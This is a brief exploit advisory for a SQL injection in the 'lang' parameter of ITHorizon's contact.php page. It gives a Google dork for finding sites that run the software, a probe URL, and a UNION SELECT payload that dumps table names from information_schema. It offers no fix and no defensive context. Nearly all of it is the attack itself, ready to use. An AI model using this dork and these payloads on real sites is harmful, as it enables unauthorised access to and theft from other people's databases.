ITHorizon suffers from a remote SQL injection vulnerability.
1bd8f9bf0eeb67f245b9383d6879358c12856ae9960086627e7f3dcf08b2dbec
################################################################################################
# Exploit Title: ITHorizon (lang) SQL Injection Vulnerability
# Author : CoBRa_21
# E-Mail : uyku_cu [at] windowslive.com
# Google Dork : Powered by ITHorizon
# Script Page : https://www.ithorizon.net/
################################################################################################
#
# Exploit
#
# https://127.0.0.1/[PATH]/contact.php?lang=1' SQL
#
# https://127.0.0.1/[PATH]/contact.php?lang=1 union select 1,2,group_concat(table_name),4 from information_schema.tables
#
#
################################################################################################